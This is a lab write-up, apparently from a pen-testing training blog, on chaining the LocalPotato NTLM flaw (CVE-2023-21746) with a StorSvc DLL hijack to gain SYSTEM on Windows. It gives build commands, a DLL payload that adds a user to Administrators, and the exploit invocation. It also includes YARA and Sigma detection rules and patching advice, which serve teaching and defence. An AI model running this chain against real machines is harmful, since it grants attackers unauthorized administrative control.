top of page

Microsoft CVE-2023-21746 Exploit: obtaining SYSTEM Access using LocalPotato NTLM

Updated: Mar 31, 2023


Why did the hacker cross the road? To get to the other network.

Introduction


On September 9, 2022, Microsoft received a report from Andrea Pierini and Antonio Cocomazzi about Windows's local privilege escalation (LPE) vulnerability. This vulnerability could enable an attacker with limited privileges on a host to gain SYSTEM privileges and read/write any file on the system.

Microsoft addressed the LocalPotato vulnerability in the January 2023 patch Tuesday, and a PoC was published on February 10, 2023. This vulnerability, CVE-2023-21746, permits an attacker with low-privilege account access to read/write arbitrary files with SYSTEM privileges. Although the vulnerability does not allow executing commands as SYSTEM, it can be combined with other vectors to achieve this result. On February 13, BlackArrowSec published a privilege escalation PoC that exploits the StorSvc service, permitting attackers to execute code as SYSTEM by writing a DLL file to any directory in the PATH. In this Tryhackme room, both vulnerabilities are investigated, and the goal is to combine them to achieve arbitrary execution as the SYSTEM user.


Triggering Privileged authentication
Triggering Privileged authentication

NTLM authentication


NTLM authentication is a standard method for users to authenticate themselves to a remote server. The process involves three packets:


  • Type 1 Message: The client sends a packet to initiate the authentication process and negotiate its terms. This packet may contain the client machine and domain names, which the server can use to verify that the authentication request comes from a different machine.

  • Type 2 Message: The server responds to the client with a challenge, a random number used to authenticate the client without sending their credentials over the network.

  • Type 3 Message: The client uses the challenge from the Type 2 message and the user's password hash to generate a response sent to the server in the Type 3 message. The server can then check if the client knows the correct password hash without sending it over the network.


The LocalPotato PoC exploits a vulnerability in a specific scenario of NTLM authentication known as NTLM local authentication. By leveraging this flaw, an attacker can deceive a high-privileged process into authenticating a session that the attacker initiates against the local SMB Server, allowing the attacker to gain a connection that provides access to all shares associated with the privileges of the compromised process, including sensitive ones such as C$ or ADMIN$.


The flow of exploit


The LocalPotato PoC takes advantage of a specific sequence of steps to exploit the NTLM local authentication vulnerability:

  1. The process begins with the attacker triggering a privileged process to connect to a rogue server that the attacker controls, similar to previous Potato exploits that utilized an unprivileged user to create connections using a privileged user (usually SYSTEM).

  2. Once the rogue server has instantiated a Security Context A for the privileged connection, the attacker launches a rogue client that initiates a connection to the local SMB Server using its unprivileged credentials. The client sends a Type1 message to initiate the connection, and the server responds with a Type2 message that contains the ID for a new Security Context B.

  3. To complete the exploit, the attacker swaps the Context IDs from both connections so that the privileged process receives the context of the SMB server connection instead of its own. This causes the Privileged client to associate its user (SYSTEM) with Security Context B of the SMB connection created by the attacker. As a result, the attacker's client gains access to any network share with the SYSTEM.

Working of NTLM authentication
Working of NTLM authentication

If an attacker gains privileged access to SMB shares, they can access and modify files on the target machine. However, they cannot directly run commands on the vulnerable machine with this method. To overcome this, they can combine this with another attack vector. The vulnerability lies in the NTLM protocol rather than the SMB Server, making this attack vector applicable to any service that uses NTLM authentication. However, the attacker must consider some limitations when choosing the protocol to attack. In the proof-of-concept, the SMB Server was used to avoid additional protections for other protocols. The exploit's author has also implemented a quick bypass to get the exploit to work against the SMB Server.


Abusing StorSvc to Execute Commands


BlackArrowSec discovered a vulnerability in the StorSvc service, which allows an attacker to trigger an RPC call to the SvcRebootToFlashingMode method. This call will result in an attempt to load a missing DLL named "SprintCSP.dll". As a result, an attacker can hijack this DLL to execute arbitrary code with SYSTEM privileges.

To join the Tryhackme Machine, use "Remmina" or any other RDP tool.



To compile RpcClient.exe, open Visual Studio and create a new C++ empty project. Then, add the storsvc_c.c file to the project and modify the first lines of code to match the target machine's operating system.

Once the code has been modified, you can compile the project into an executable. The resulting RpcClient.exe file will trigger the RPC call to SvcRebootToFlashingMode.


To compile SprintCSP.dll, you must open Visual Studio and create a new C++ DLL project. Then, add the "sprintdll.c" file to the project and modify the code to run a reverse shell command instead of the whoami command.

Once the code has been modified, you can compile the project into a DLL. The resulting SprintCSP.dll file will be placed in a directory writable by non-privileged users and loaded whenever a call to SvcRebootToFlashingMode is made.

After both files have been compiled, you can execute the DLL hijacking attack by placing SprintCSP.dll in a directory writable by non-privileged users and running RpcClient.exe to trigger the RPC call to SvcRebootToFlashingMode.


C:\> cd C:\tools\LPE via StorSvc\RpcClient\

C:\tools\LPE via StorSvc\RpcClient> msbuild RpcClient.sln
... some output was omitted...

Build succeeded.
  0 Warning(s)
  0 Error(s)

C:\tools\LPE via StorSvc\RpcClient> move x64\Debug\RpcClient.exe C:\Users\user\Desktop\


After compiling, the executable file can be located on the desktop. The next step is to modify the DoStuff() function located in the main.c file, accessed through the path "C:\tools\LPE via StorSvc\SprintCSP\SprintCSP". The modification will grant us privileged access to the machine by adding the current user to the Administrators group for convenience.


C:\> cd C:\tools\LPE via StorSvc\SprintCSP\
C:\tools\LPE via StorSvc\SprintCSP> msbuild SprintCSP.sln
C:\tools\LPE via StorSvc\SprintCSP> move x64\Debug\SprintCSP.dll C:\Users\user\Desktop\

void DoStuff() {

  // Replace all this code with your payload
  STARTUPINFO si = { sizeof(STARTUPINFO) };
  PROCESS_INFORMATION pi;
  CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add",
    NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);


  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
  return;
}

Now we are ready to start exploiting this!


Elevating our Privileges


Before proceeding with the exploit, having the necessary files on your desktop is essential. These files include LocalPotato.exe exploit, RpcClient.exe, and SprintCSP.dll. If any files are missing, you can return to the previous task to build them. With all the required files in place, you can launch the exploit.

Before proceeding with the next step, confirming that the current user is not already a member of the Administrators group is important. This can be done by performing a quick verification check.


To exploit StorSvc, copying SprintCSP.dll to a directory in the current PATH is necessary. To verify the current PATH, you can execute the following command:


reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -v Path

Output:


Path  REG_EXPAND_SZ  %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;
              %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;
              C:\Program Files\Amazon\cfn-bootstrap\


The target directory for copying the SprintCSP.dll is the "%SystemRoot%\system32" directory, which expands to "C:\windows\system32". However, any directory can be used for this purpose. It's recommended to check the directory permissions before copying the DLL file. For example, copying the DLL file directly into the system32 directory may fail due to insufficient user privileges.


C:\Users\user\Desktop> copy SprintCSP.dll C:\Windows\System32\SprintCSP.dll
Access is denied.


Now Run the exploit "Localpotato.exe"


LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll


Check Net user for confirmation.


After successfully copying the SprintCSP.dll to the target directory, the next step is to execute the payload using RpcClient.exe. The execution of the payload can be triggered by calling the SvcRebootToFlashingMode function. By running RpcClient.exe, the payload contained in the DLL will be executed as expected.

Get the flag!!!



DETECTION


Detecting the activity involved in this attack, which includes running an executable in the command line terminal with specific arguments, can be challenging. However, two common approaches to detecting this activity include using pattern-matching tools such as YARA to identify file patterns, and analyzing the events generated by the execution of the LocalPotato.exe hack tool. By employing these techniques, it is possible to identify and mitigate potential security threats.

YARA Rule:


It is possible to create a YARA rule to detect the presence of the LocalPotato.exe hack tool within the system. This rule can be used with other detection tools, such as THOR, to scan the host and identify any instances of the tool. Using such techniques, potential security threats can be identified and addressed in a timed fashion.

rule detect_localpotato {
  meta:
    description = "Detects the localpotato exploit"
  strings:
        $CLSID = "854A20FB-2D44-457D-992F-EF13785D2B51"
$localpotato = {6c 6f 63 61 6c 70 6f 74 61 74 6f}
$ntlm = {4e 54 4c 4d}
$function = "NtQueryInformationProcess"

  condition:
    all of them
}

SIGMA


SIGMA is a commonly used signature language that can be utilized to create detection rules based on patterns found within Event Logs. To detect instances of LocalPotato in a network, it is important to have centralized logs monitoring enabled. The official SIGMA repository provides a sample rule that can be used to detect LocalPotato. Using such rules makes it possible to identify potential security threats and take appropriate measures to address them.


title: HackTool - LocalPotato Execution
id: 6bd75993-9888-4f91-9404-e1e4e4e34b77
status: experimental
description: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
references:
  - https://www.localpotato.com/localpotato_html/LocalPotato.html 
  - https://github.com/decoder-it/LocalPotato 
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023/02/14
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - cve.2023.21746
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith: '\LocalPotato.exe'
  selection_cli:
    CommandLine|contains|all:
      - '.exe -i C:\'
      - '-o Windows\'
  selection_hash_plain:
    Hashes|contains:
      - 'IMPHASH=E1742EE971D6549E8D4D81115F88F1FC'
      - 'IMPHASH=DD82066EFBA94D7556EF582F247C8BB5'
  selection_hash_ext:
    Imphash:
      - 'E1742EE971D6549E8D4D81115F88F1FC'
      - 'DD82066EFBA94D7556EF582F247C8BB5'
  condition: 1 of selection_*
falsepositives:
  - Unlikely
level: high

Detecting Storsvc and SprintCSP.dll Hijacking


title: Creation Of Non-Existent System DLL
id: df6ecb8b-7822-4f4b-b412-08f524b4576c
related:
  - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 # ImageLoad rule
   type: similar
status: experimental
description: Detects the creation of system dlls that are not present on the system. Usually, to achieve dll hijacking
references:
  - https://decoded.avast.io/martinchlumecky/png-steganography/
author: Nasreddine Bencherchali (Nextron Systems), fornotes
date: 2022/12/01
modified: 2023/02/15
tags:
  - attack.defense_evasion
  - attack.persistence
  - attack.privilege_escalation
  - attack.t1574.001
  - attack.t1574.002
logsource:
  product: windows
  category: file_event
detection:
  selection:
    - TargetFilename:
      - 'C:\Windows\System32\WLBSCTRL.dll'
      - 'C:\Windows\System32\TSMSISrv.dll'
      - 'C:\Windows\System32\TSVIPSrv.dll'
      - 'C:\Windows\System32\wow64log.dll'
      - 'C:\Windows\System32\WptsExtensions.dll'
      - 'C:\Windows\System32\wbem\wbemcomn.dll'
    - TargetFilename|endswith: '\SprintCSP.dll'
  filter:
    Image|startswith: 'C:\Windows\System32\'
  condition: selection and not filter
falsepositives:
  - Unknown
level: medium

Mitigation


Ensuring that all systems are updated with the latest security patches is vital to prevent attackers from exploiting the localpotato exploit. This vulnerability targets a vulnerability in the Windows operating system, but it can be mitigated by keeping the system up-to-date with the latest security patches. It is important to note that this vulnerability does not affect systems that have been patched. By staying updated with security patches, organizations can prevent potential security threats and ensure the safety of their systems.

A key strategy to prevent "localpotato" exploitation is implementing the least privilege principle. This approach involves limiting user access to only the resources they need to carry out their job responsibilities. This way, attackers are less likely to gain the elevated privileges necessary to execute the exploit. By implementing the principle of least privilege, organizations can significantly reduce the risk of exploitation and ensure that their systems remain secure. Additionally, organizations should regularly review and update their privilege access policies to ensure they are up-to-date and effective in preventing unauthorized access to sensitive resources.



References:

 

Register for instructor-led online courses today!


Check out our free programs!


Reach out to us with your custom pen testing needs at: info@darkrelay.com


7,020 views

Comments

Couldn’t Load Comments
It looks like there was a technical problem. Try reconnecting or refreshing the page.
bottom of page